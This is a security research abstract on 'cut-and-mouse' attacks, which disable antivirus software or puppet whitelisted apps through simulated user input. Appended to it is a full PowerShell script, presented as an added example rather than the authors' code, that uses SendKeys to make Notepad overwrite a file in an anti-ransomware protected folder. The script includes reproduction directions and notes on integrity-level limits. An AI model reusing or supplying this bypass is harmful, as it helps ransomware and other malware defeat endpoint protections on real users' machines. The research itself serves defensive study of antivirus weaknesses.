A Game of "Cut and Mouse": Bypassing Antivirus by Simulating User Inputs
Most users and companies rely heavily on anti-virus (AV) software to protect their digital assets, mainly programs and data, from malware. AVs are, however, engaged in a \emph{cat-and-mouse} game with malware. The latter try either to bypass (evade) AVs, e.g., through obfuscation and polymorphism, or to disable AVs, e.g., through denial-of-service attacks or by sending malformed packets or parameters that crash the AV. In turn, AVs try to mitigate the first class of attacks with some form of anomaly or behavioral detection, and to stop the second by hardening themselves, e.g., by relying on OS protections, standard code, and binary-protection techniques. Malware then attempts to bypass behavioral detection by using, for instance, adversarial inputs. The \emph{cat-and-mouse} game goes on, apparently endlessly. In this paper, we investigate one additional, and novel, move in this game: whether malware can be instrumented to send keyboard and mouse events, such as ``cut and paste'' and ``click'' events, to deactivate key AV functionalities, thus entirely bypassing their protection mechanisms. We tested the resilience of several AVs against being disabled by proof-of-concept malware that mimics user input on the AV's main graphical interface in order to turn the AV off. What we found is disturbing: most of the AVs can easily be disabled by such an attack. We then extended the attack from deactivating high-integrity applications to sending them keyboard and mouse events so that they perform malicious operations on behalf of the malware. We found that we can circumvent anti-ransomware protected-folder features by controlling a whitelisted application, namely \code{Notepad}, to bypass the restrictions in place. In fact, we manage to use \code{Notepad} as a puppet to rewrite the content of a protected file. Recalling the cat-and-mouse analogy, we call this class of attacks \emph{cut-and-mouse}.
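As an illustration of the mechanics the abstract describes, the following PowerShell script is an added example, not the authors' proof-of-concept (which the abstract does not show): it drives \code{Notepad} as a "puppet" through synthetic keyboard input so that \code{Notepad}, rather than the script, performs the write to a file. The target path \code{C:\Users\victim\Documents\protected.txt}, the payload text and the timing delays are assumptions for illustration; to reproduce the check the abstract describes, point \code{$Target} at a file inside a folder covered by an AV's anti-ransomware protected-folder feature, with \code{Notepad} on that feature's whitelist.

```powershell
# Added example (not the paper's PoC): rewrite a file through Notepad using
# synthetic keystrokes. $Target and $Payload are assumed values.
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic

$Target  = 'C:\Users\victim\Documents\protected.txt'   # assumed path
$Payload = 'rewritten by a whitelisted application'     # assumed content

# Start Notepad, wait until it is ready for input, and bring it to the foreground
# (SendKeys delivers keystrokes to whichever window currently has focus).
$np = Start-Process -FilePath notepad.exe -PassThru
$null = $np.WaitForInputIdle(5000)
[Microsoft.VisualBasic.Interaction]::AppActivate($np.Id)
Start-Sleep -Milliseconds 500

# Ctrl+O opens the Open dialog; the path is typed into the focused "File name" box.
# SendKeys treats + ^ % ~ ( ) { } [ ] as control characters, so brace-escape them.
$escaped = [regex]::Replace($Target, '[+^%~(){}\[\]]', '{$0}')
[System.Windows.Forms.SendKeys]::SendWait('^o')
Start-Sleep -Milliseconds 500
[System.Windows.Forms.SendKeys]::SendWait($escaped + '{ENTER}')
Start-Sleep -Milliseconds 500

# Select all existing text, replace it, and save. The write to $Target is issued
# by notepad.exe, the whitelisted process, not by this script.
[System.Windows.Forms.SendKeys]::SendWait('^a')
[System.Windows.Forms.SendKeys]::SendWait($Payload)
[System.Windows.Forms.SendKeys]::SendWait('^s')
Start-Sleep -Milliseconds 500
$null = $np.CloseMainWindow()

# Check from the script's side whether the rewrite landed.
if ((Get-Content -Path $Target -Raw) -like "$Payload*") {
    Write-Output 'File rewritten via Notepad.'
} else {
    Write-Output 'Rewrite blocked or did not land.'
}
```

Two caveats a practitioner should keep in mind. First, the script only shows the input-injection mechanic; whether a given AV's protected-folder feature actually lets the write through is exactly the per-product question the paper sets out to measure, and nothing here should be read as a result for any specific product. Second, Windows' User Interface Privilege Isolation (UIPI) blocks synthetic input sent from a process at a lower integrity level to a window at a higher one; a \code{Notepad} launched by the script inherits the script's own integrity level, so this path is unaffected, but driving a separately running, higher-integrity application's GUI (the AV's own interface, in the abstract's first attack) depends on whether that interface is in fact running at a higher integrity level than the malware.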